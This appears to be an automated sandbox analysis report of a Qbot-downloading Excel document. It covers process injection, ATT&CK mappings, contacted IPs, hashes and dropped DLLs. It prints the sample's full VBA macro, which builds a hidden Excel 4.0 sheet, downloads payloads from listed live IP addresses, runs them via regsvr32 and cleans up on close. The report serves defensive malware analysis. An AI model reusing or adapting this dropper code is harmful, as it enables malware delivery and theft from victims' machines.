                        Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: F0000 protect: page read and write
                        Injects code into the Windows Explorer (explorer.exe)
                        Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 1016 base: B0000 value: 9C
                        Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 1016 base: 44102D value: E9
                        Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 3016 base: F0000 value: 9C
                        Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 3016 base: 44102D value: E9
                        Yara detected hidden Macro 4.0 in Excel
                        Source: Yara match File source: xls.xls, type: SAMPLE
                        Source: explorer.exe, 00000007.00000002.888554207.0000000000C30000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
                        Source: explorer.exe, 00000007.00000002.888554207.0000000000C30000.00000002.00020000.sdmp Binary or memory string: !Progman
                        Source: explorer.exe, 00000007.00000002.888554207.0000000000C30000.00000002.00020000.sdmp Binary or memory string: Program Manager<
                        Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_000831C2 CreateNamedPipeA
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_1000980C GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,GetSystemInfo,GetWindowsDirectoryW

                        Stealing of Sensitive Information:

                        Yara detected Qbot
                        Source: Yara match | File source: 7.2.explorer.exe.80000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 6.2.regsvr32.exe.3b0000.1.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 14.2.explorer.exe.c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 6.2.regsvr32.exe.3b0000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 7.2.explorer.exe.80000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 14.2.explorer.exe.c0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000D.00000002.635284743.0000000000300000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000006.00000002.619249193.00000000003B0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, type: MEMORY

                        Remote Access Functionality:

                        Yara detected Qbot

                        Mitre Att&ck Matrix

                        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                        Valid Accounts | Command and Scripting Interpreter 11 | Windows Service 3 | Windows Service 3 | Masquerading 121 | Credential API Hooking 1 | System Time Discovery 1 | Remote Services | Credential API Hooking 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                        Default Accounts | Scheduled Task/Job 1 | Scheduled Task/Job 1 | Process Injection 413 | Disable or Modify Tools 1 | LSASS Memory | Security Software Discovery 1 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                        Domain Accounts | Scripting 2 | Logon Script (Windows) | Scheduled Task/Job 1 | Modify Registry 1 | Security Account Manager | Virtualization/Sandbox Evasion 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                        Local Accounts | Service Execution 2 | Logon Script (Mac) | Logon Script (Mac) | Virtualization/Sandbox Evasion 1 | NTDS | Process Discovery 3 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 21 | SIM Card Swap | | Carrier Billing Fraud
                        Cloud Accounts | Native API 3 | Network Logon Script | Network Logon Script | Process Injection 413 | LSA Secrets | File and Directory Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                        Replication Through Removable Media | Exploitation for Client Execution 32 | Rc.common | Rc.common | Scripting 2 | Cached Domain Credentials | System Information Discovery 15 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                        External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information 1 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact

                        Behavior Graph

                        [Behavior graph not reproduced. Behavior Graph ID: 492442; Sample: xls.xls; Start date: 28/09/2021; Architecture: WINDOWS; Score: 100]

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        Source | Detection | Scanner | Label | Link
                        xls.xls | 31% | Virustotal | |

                        Dropped Files

                        Source | Detection | Scanner | Label | Link
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.7495993056[1].dat | 100% | Joe Sandbox ML | |

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        Source | Detection | Scanner | Label | Link
                        http://www.%s.comPA | 0% | URL Reputation | safe |
                        http://190.14.37.178/44467.7495993056.dat | 0% | Avira URL Cloud | safe |
                        http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe |

                        Domains and IPs

                        Contacted Domains

                        No contacted domains info

                        Contacted URLs

                        Name | Malicious | Antivirus Detection | Reputation
                        http://190.14.37.178/44467.7495993056.dat | false | Avira URL Cloud: safe | unknown

                        URLs from Memory and Binaries

                        Name | Source | Malicious | Antivirus Detection | Reputation
                        http://www.%s.comPA | regsvr32.exe, 00000006.00000002.620761307.0000000002220000.00000002.00020000.sdmp, explorer.exe, 00000007.00000002.888614780.0000000002030000.00000002.00020000.sdmp | false | URL Reputation: safe | low
                        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | explorer.exe, 00000007.00000002.888614780.0000000002030000.00000002.00020000.sdmp | false | | high
                        http://servername/isapibackend.dll | regsvr32.exe, 00000005.00000002.623444753.0000000001DE0000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.619701962.0000000001D20000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.624053267.0000000001C80000.00000002.00020000.sdmp, regsvr32.exe, 0000000A.00000002.624752810.0000000001D10000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.638759143.00000000009E0000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low

                          Contacted IPs

                          Public

                          IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                          185.183.96.67 | unknown | Netherlands | | 60117 | HSAE | false
                          190.14.37.178 | unknown | Panama | | 52469 | OffshoreRacksSAPA | false
                          185.250.148.213 | unknown | Russian Federation | | 48430 | FIRSTDC-ASRU | false

                          General Information

                          Joe Sandbox Version:33.0.0 White Diamond
                          Analysis ID:492442
                          Start date:28.09.2021
                          Start time:17:59:03
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 14m 22s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Sample file name:xls.xls
                          Cookbook file name:defaultwindowsofficecookbook.jbs
                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                          Number of analysed new started processes analysed:22
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal100.troj.expl.evad.winXLS@25/6@0/3
                          EGA Information:
                          • Successful, ratio: 100%
                          HDC Information:
                          • Successful, ratio: 20.6% (good quality ratio 19%)
                          • Quality average: 75%
                          • Quality standard deviation: 29.1%
                          HCA Information:
                          • Successful, ratio: 86%
                          • Number of executed functions: 141
                          • Number of non-executed functions: 88
                          Cookbook Comments:
                          • Adjust boot time
                          • Enable AMSI
                          • Found application associated with file extension: .xls
                          • Changed system and user locale, location and keyboard layout to English - United States
                          • Found Word or Excel or PowerPoint or XPS Viewer
                          • Attach to Office via COM
                          • Scroll down
                          • Close Viewer
                          Warnings:
                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                          • Not all processes where analyzed, report is missing behavior information
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          • Report size getting too big, too many NtSetInformationFile calls found.

                          Simulations

                          Behavior and APIs

                          Time | Type | Description
                          18:00:55 | API Interceptor | 30x Sleep call for process: regsvr32.exe modified
                          18:00:57 | API Interceptor | 870x Sleep call for process: explorer.exe modified
                          18:01:01 | API Interceptor | 2x Sleep call for process: schtasks.exe modified
                          18:01:02 | Task Scheduler | Run new task: mywmprn path: regsvr32.exe s>-s "C:\Users\user\Drezd.red"

                          Joe Sandbox View / Context

                          IPs

                          Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                          185.183.96.67 | #Qbot downloader.xls | | malicious | | 185.183.96.67/44466.8890891204.dat
                          | Compensation-2308017-09272021.xls | | malicious | | 185.183.96.67/44466.7516903935.dat
                          | Compensation-1730406737-09272021.xls | | malicious | | 185.183.96.67/44466.7022844907.dat

                          Domains

                          No context

                          ASN


                          JA3 Fingerprints

                          No context

                          Dropped Files

                          Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                          C:\Users\user\Drezd.red | Compensation-1214892625-09272021.xls | | malicious | |
                          | Compensation-2100058996-09272021.xls | | malicious | |
                          | Compensation-1657705079-09272021.xls | | malicious | |
                          | Compensation-1214892625-09272021.xls | | malicious | |
                          | #Qbot downloader.xls | | malicious | |
                          | Compensation-2308017-09272021.xls | | malicious | |
                          | Compensation-1730406737-09272021.xls | | malicious | |

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.7495993056[1].dat
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):387072
                                        Entropy (8bit):4.528520016236287
                                        Encrypted:false
                                        SSDEEP:3072:Do6vBnby4Yx0XjFFzPQ0MslzERfQB24hLxBVi/b/9+PdpiWC35ol/uwfTuT2b2Mx:vs6Xpq0H3Jhds/9+qC/zfTPLL
                                        MD5:6C89E2D95882B9668285D9C8DF9EED6D
                                        SHA1:EC523CA5548802700D486A209C14173A6D6CDA54
                                        SHA-256:B8D85FEF926FC94B34936042F552EAF2B148255BB2A3FF40894539C956531B31
                                        SHA-512:1F0D781EFB3C1E1E317B4066D3E1081BA9333F60B19B91C351C44AA3F774B47BBC27EAE47BA75486017358D7D0805FE09C8303D7FB506A0F3ECC66808E7203A1
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;a...........!......................... ............................... ....................................... ..p.......|.... ...............................................................................................................text............................... ..`.edata..p.... ......................@..@.data.... ...0......................@....data...T....P.......$..............@....rdatat.H...........................@....rsrc........ ......................@..@.........P...0...P...............................P.......P...H...........................P.......P..............................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):162688
                                        Entropy (8bit):4.25437517071697
                                        Encrypted:false
                                        SSDEEP:1536:C6ddL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcm48s:CSJNSc83tKBAvQVCgOtmXmLpLm4l
                                        MD5:40C07C4525D96EAF485988B9D7CB3F9D
                                        SHA1:4093F92CC11B8BC488A39FFB06DEDED5CA6E9A8E
                                        SHA-256:1A992CFD9414F84D1FC0A51CABC0BB705CB9EF4345C5E8A1AB441803A9EE228A
                                        SHA-512:F5C6931322070E731C49A811564CF99C353916ACBEF78B49160DC8273F972FAA4F3D78A0B5692060629FA76C417A50A09BF71AC16712164ADBE96453C45D3707
                                        Malicious:false
                                        C:\Users\user\AppData\Local\Temp\VBE\RefEdit.exd
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):15676
                                        Entropy (8bit):4.532606740739516
                                        Encrypted:false
                                        SSDEEP:192:Wxl811DxzCOtHIT6P20eChgZjTdZ3HJV8L1I17EMBkDXrq9LwGGLVbkLde:W3wxesT20lheZ3waE5D7qxIxkxe
                                        MD5:F79E24E707B060705D150AAE1D1AD517
                                        SHA1:A5ACE1DDC4B04D65BE1B3A9547C92813B0B809B7
                                        SHA-256:014435EA0D1AF50297D57F20D2AE473FAA96BCBCDA38FB0F9724E9266F30B6A6
                                        SHA-512:E35DD740D2BE0FAF6EE9DA0CA4CB51ABF191367BDF2F598E129FCEA840ADE31776A28EAB66EC10892846E12AD9ADC0FD8E6CCC65D4B2748C8EF7ACFB7568CE82
                                        Malicious:false
                                        C:\Users\user\Drezd.red
                                        Process:C:\Windows\SysWOW64\explorer.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):387072
                                        Entropy (8bit):1.6961804656486577
                                        Encrypted:false
                                        SSDEEP:1536:92VcC6MtqWgV3vAFNJ3JXS9n5SYCR44u029R+J:XC6MtAAFNJ5XC5SYCi02r+J
                                        MD5:B19B0AF9A01DD936D091C291B19696C8
                                        SHA1:862ED0B9586729F2633670CCD7D075D7693908E1
                                        SHA-256:17D261EACA2629EF9907D0C00FB2271201E466796F06DCB7232900D711C29330
                                        SHA-512:9F0CE65AFA00919797A3A75308CF49366D5DCA0C17EA3CFAB70A9E9244E0D5AB6DEC21A3A46C2C609159E0CBF91AF4F10E6A36F3FB7310A5C2B062249AB43DB4
                                        Malicious:true
                                        Joe Sandbox View:
                                        • Filename: Compensation-1214892625-09272021.xls, Detection: malicious
                                        • Filename: Compensation-2100058996-09272021.xls, Detection: malicious
                                        • Filename: Compensation-1657705079-09272021.xls, Detection: malicious
                                        • Filename: Compensation-1214892625-09272021.xls, Detection: malicious
                                        • Filename: #Qbot downloader.xls, Detection: malicious
                                        • Filename: Compensation-2308017-09272021.xls, Detection: malicious
                                        • Filename: Compensation-1730406737-09272021.xls, Detection: malicious
                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;a...........!......................... ............................... ....................................... ..p.......|.... ...............................................................................................................text............................... ..`.edata..p.... ......................@..@.data.... ...0......................@....data...T....P.......$..............@....rdatat.H...........................@....rsrc........ ......................@..@.........P...0...P...............................P.......P...H...........................P.......P..............................................................................................................................................................................................................................................................................................

                                        Static File Info

                                        General

                                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Test, Last Saved By: Test, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Mon Sep 27 10:38:52 2021, Security: 0
                                        Entropy (8bit):7.131906653704249
                                        TrID:
                                        • Microsoft Excel sheet (30009/1) 47.99%
                                        • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                        • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                        File name:xls.xls
                                        File size:129024
                                        MD5:170b6a83db1f64901d186eda31962306
                                        SHA1:9dedf1b8c2af2ea202b62b8c8a07a314f56ca6d5
                                        SHA256:7afc98f96efa95af64e356e7857d7db38e9d2eb9a0b8cab36acc7f8b96b7f978
                                        SHA512:d11fddb5698ddba3340c42ddf2012c847eea3d03003bb6b84cf9aff30ab21568d416683d431547d1d07c03d4511fb9677f7b220eb38d4b2080e4e55ac77e13be
                                        SSDEEP:3072:Cik3hOdsylKlgxopeiBNhZFGzE+cL2kdAnc6YehWfG+tUHKGDbpmsiinBti2JtqV:vk3hOdsylKlgxopeiBNhZF+E+W2kdAne

                                        File Icon

                                        Icon Hash:e4eea286a4b4bcb4

                                        Static OLE Info

                                        General

                                        Document Type:OLE
                                        Number of OLE Files:1

                                        OLE File "xls.xls"

                                        Indicators

                                        Has Summary Info:True
                                        Application Name:Microsoft Excel
                                        Encrypted Document:False
                                        Contains Word Document Stream:False
                                        Contains Workbook/Book Stream:True
                                        Contains PowerPoint Document Stream:False
                                        Contains Visio Document Stream:False
                                        Contains ObjectPool Stream:
                                        Flash Objects Count:
                                        Contains VBA Macros:True

                                        Summary

                                        Code Page:1251
                                        Author:Test
                                        Last Saved By:Test
                                        Create Time:2015-06-05 18:17:20
                                        Last Saved Time:2021-09-27 09:38:52
                                        Creating Application:Microsoft Excel
                                        Security:0

                                        Document Summary

                                        Document Code Page:1251
                                        Thumbnail Scaling Desired:False
                                        Company:
                                        Contains Dirty Links:False
                                        Shared Document:False
                                        Changed Hyperlinks:False
                                        Application Version:1048576

                                        Streams with VBA

                                        VBA File Name: UserForm2, Stream Size: -1
                                        General
                                        Stream Path:_VBA_PROJECT_CUR/UserForm2
                                        VBA File Name:UserForm2
                                        Stream Size:-1
                                        Data ASCII:
                                        Data Raw:
                                        VBA Code
                                        Attribute VB_Name = "UserForm2"
                                        Attribute VB_Base = "0{C7392748-7F28-4EE6-BCFC-6C9C72F3AD88}{96B851A6-6A1B-4177-A71C-36C172A843DA}"
                                        Attribute VB_GlobalNameSpace = False
                                        Attribute VB_Creatable = False
                                        Attribute VB_PredeclaredId = True
                                        Attribute VB_Exposed = False
                                        Attribute VB_TemplateDerived = False
                                        Attribute VB_Customizable = False
                                        VBA File Name: Module5, Stream Size: 4241
                                        General
                                        Stream Path:_VBA_PROJECT_CUR/VBA/Module5
                                        VBA File Name:Module5
                                        Stream Size:4241
                                        VBA Code
                                        Attribute VB_Name = "Module5"
                                        
                                        Sub auto_open()
                                        On Error Resume Next
                                        Trewasd = "REGISTER"
                                        Drezden = "="
                                        Naret = "EXEC"
                                        Application.ScreenUpdating = False
                                        Gert
                                        Sheets("Sheet777").Visible = False
                                        Sheets("Sheet777").Range("A1:M100").Font.Color = vbWhite
                                        
                                        Sheets("Sheet777").Range("H24") = UserForm2.Label1.Caption
                                        Sheets("Sheet777").Range("H25") = UserForm2.Label3.Caption
                                        Sheets("Sheet777").Range("H26") = UserForm2.Label4.Caption
                                        
                                        Sheets("Sheet777").Range("K17") = "=NOW()"
                                        Sheets("Sheet777").Range("K18") = ".dat"
                                        Sheets("Sheet777").Range("K18") = ".dat"
                                        
                                        
                                        Sheets("Sheet777").Range("H35") = "=HALT()"
                                        Sheets("Sheet777").Range("I9") = UserForm2.Label2.Caption
                                        Sheets("Sheet777").Range("I10") = UserForm2.Caption
                                        Sheets("Sheet777").Range("I11") = "J" & "J" & "C" & "C" & "B" & "B"
                                        Sheets("Sheet777").Range("I12") = "Byukilos"
                                        Sheets("Sheet777").Range("G10") = "..\Drezd.red"
                                        Sheets("Sheet777").Range("G11") = "..\Drezd1.red"
                                        Sheets("Sheet777").Range("G12") = "..\Drezd2.red"
                                        Sheets("Sheet777").Range("I17") = "regsvr32 -silent ..\Drezd.red"
                                        Sheets("Sheet777").Range("I18") = "regsvr32 -silent ..\Drezd1.red"
                                        Sheets("Sheet777").Range("I19") = "regsvr32 -silent ..\Drezd2.red"
                                        Sheets("Sheet777").Range("H10") = "=Byukilos(0,H24&K17&K18,G10,0,0)"
                                        Sheets("Sheet777").Range("H11") = "=Byukilos(0,H25&K17&K18,G11,0,0)"
                                        Sheets("Sheet777").Range("H12") = "=Byukilos(0,H26&K17&K18,G12,0,0)"
                                        Sheets("Sheet777").Range("H9") = Drezden & Trewasd & "(I9,I10&J10,I11,I12,,1,9)"
                                        Sheets("Sheet777").Range("H17") = Drezden & Naret & "(I17)"
                                        Sheets("Sheet777").Range("H18") = Drezden & Naret & "(I18)"
                                        Sheets("Sheet777").Range("H19") = Drezden & Naret & "(I19)"
                                        
                                        
                                        Application.Run Sheets("Sheet777").Range("H1")
                                        
                                        End Sub
                                        
                                        Sub auto_close()
                                        On Error Resume Next
                                        Application.ScreenUpdating = True
                                           Application.DisplayAlerts = False
                                           Sheets("Sheet777").Delete
                                           Application.DisplayAlerts = True
                                        End Sub
                                        
                                        Function Gert()
                                        Set Fera = Excel4IntlMacroSheets
                                        Fera.Add.Name = "Sheet777"
                                        End Function
                                        VBA File Name: Sheet1, Stream Size: 991
                                        General
                                        Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                        VBA File Name:Sheet1
                                        Stream Size:991
                                        VBA Code
                                        Attribute VB_Name = "Sheet1"
                                        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                        Attribute VB_GlobalNameSpace = False
                                        Attribute VB_Creatable = False
                                        Attribute VB_PredeclaredId = True
                                        Attribute VB_Exposed = True
                                        Attribute VB_TemplateDerived = False
                                        Attribute VB_Customizable = True
                                        VBA File Name: ThisWorkbook, Stream Size: 2501
                                        General
                                        Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                        VBA File Name:ThisWorkbook
                                        Stream Size:2501
                                        VBA Code
                                        Attribute VB_Name = "ThisWorkbook"
                                        Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                        Attribute VB_GlobalNameSpace = False
                                        Attribute VB_Creatable = False
                                        Attribute VB_PredeclaredId = True
                                        Attribute VB_Exposed = True
                                        Attribute VB_TemplateDerived = False
                                        Attribute VB_Customizable = True
                                        Option Explicit
                                        
                                        Private m_openAlreadyRan As Boolean
                                        Private m_isOpenDelayed As Boolean
                                        
                                        Friend Sub FireOpenEventIfNeeded(Optional dummyVarToMakeProcHidden As Boolean)
                                        End Sub
                                        
                                        Private Sub asWorkbook_Activateas()
                                            On Error Resume Next
                                        
                                            If m_isOpenDelayed Then
                                                m_isOpenDelayed = False
                                                InitWorkbook
                                            End If
                                        End Sub
                                        
                                        Private Sub saWorkbook_Opensa()
                                            On Error Resume Next
                                        
                                        
                                        End Sub
                                        
                                        Private Sub ssaaInitWorkbookssaa()
                                            On Error Resume Next
                                        
                                            If VBA.Val(Application.Version) < 12 Then
                                                Me.Close False
                                                Exit Sub
                                            End If
                                            '
                                                'Other code
                                                '
                                                '
                                                '
                                        End Sub
                                        VBA File Name: UserForm2, Stream Size: 1182
                                        General
                                        Stream Path:_VBA_PROJECT_CUR/VBA/UserForm2
                                        VBA File Name:UserForm2
                                        Stream Size:1182
                                        VBA Code
                                        Attribute VB_Name = "UserForm2"
                                        Attribute VB_Base = "0{C7392748-7F28-4EE6-BCFC-6C9C72F3AD88}{96B851A6-6A1B-4177-A71C-36C172A843DA}"
                                        Attribute VB_GlobalNameSpace = False
                                        Attribute VB_Creatable = False
                                        Attribute VB_PredeclaredId = True
                                        Attribute VB_Exposed = False
                                        Attribute VB_TemplateDerived = False
                                        Attribute VB_Customizable = False

                                        Streams

                                        Stream Path: \x1CompObj, File Type: data, Stream Size: 108
                                        General
                                        Stream Path:\x1CompObj
                                        File Type:data
                                        Stream Size:108
                                        Entropy:4.18849998853
                                        Base64 Encoded:True
                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
                                        Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                                        General
                                        Stream Path:\x5DocumentSummaryInformation
                                        File Type:data
                                        Stream Size:244
                                        Entropy:2.65175227267
                                        Base64 Encoded:False
                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                                        Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 208
                                        General
                                        Stream Path:\x5SummaryInformation
                                        File Type:data
                                        Stream Size:208
                                        Entropy:3.33231709703
                                        Base64 Encoded:False
                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T e s t . . . . . . . . . . . . T e s t . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . x s . . . . . @ . . . . . 6 { . . . . . . . . . . . .
                                        Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 101831
                                        General
                                        Stream Path:Workbook
                                        File Type:Applesoft BASIC program data, first line number 16
                                        Stream Size:101831
                                        Entropy:7.65479066874
                                        Base64 Encoded:True
                                        Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . T e s t B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . V e 1 8 . . . . . . . X . @
                                        Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 662
                                        General
                                        Stream Path:_VBA_PROJECT_CUR/PROJECT
                                        File Type:ASCII text, with CRLF line terminators
                                        Stream Size:662
                                        Entropy:5.27592988154
                                        Base64 Encoded:True
                                        Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . M o d u l e = M o d u l e 5 . . B a s e C l a s s = U s e r F o r m 2 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t
                                        Stream Path: _VBA_PROJECT_CUR/PROJECTlk, File Type: dBase IV DBT, blocks size 0, block length 17920, next free block index 65537, Stream Size: 30
                                        General
                                        Stream Path:_VBA_PROJECT_CUR/PROJECTlk
                                        File Type:dBase IV DBT, blocks size 0, block length 17920, next free block index 65537
                                        Stream Size:30
                                        Entropy:1.37215976263
                                        Base64 Encoded:False
                                        Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 116
                                        General
                                        Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                        File Type:data
                                        Stream Size:116
                                        Entropy:3.43722878834
                                        Base64 Encoded:False
                                        Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 5 . M . o . d . u . l . e . 5 . . . U s e r F o r m 2 . U . s . e . r . F . o . r . m . 2 . . . . .
                                        Stream Path: _VBA_PROJECT_CUR/UserForm2/\x1CompObj, File Type: data, Stream Size: 97
                                        General
                                        Stream Path:_VBA_PROJECT_CUR/UserForm2/\x1CompObj
                                        File Type:data
                                        Stream Size:97
                                        Entropy:3.61064918306
                                        Base64 Encoded:False
                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                        Stream Path: _VBA_PROJECT_CUR/UserForm2/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 302
                                        General
                                        Stream Path:_VBA_PROJECT_CUR/UserForm2/\x3VBFrame
                                        File Type:ASCII text, with CRLF line terminators
                                        Stream Size:302
                                        Entropy:4.65399600072
                                        Base64 Encoded:True
